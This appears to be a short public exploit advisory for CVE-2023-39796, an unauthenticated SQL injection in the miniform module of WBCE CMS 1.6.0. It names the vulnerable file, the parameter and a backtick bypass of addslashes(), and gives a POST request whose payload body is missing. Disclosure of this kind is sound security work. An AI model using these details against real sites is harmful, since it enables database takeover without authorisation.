Authored by Young Pope

WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

advisories | CVE-2023-39796

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0
# Date: 15.11.2023
# Exploit Author: young pope
# Vendor Homepage:
# Software Link:
# Version: 1.6.0
# Tested on: Kali linux
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a
default module installed in the *WBCE* cms. It is an unauthenticated
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no
authentication check. On line |40| in this file, there is a |DELETE|
query that is vulnerable, an attacker could jump from the query using
tick sign - ```.

Function |addslashes()|
( escapes only
these characters and not a tick sign:

* single quote (')
* double quote (")
* backslash ()
* NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:


POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 162
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate



The response is received after 6s.

Reference links: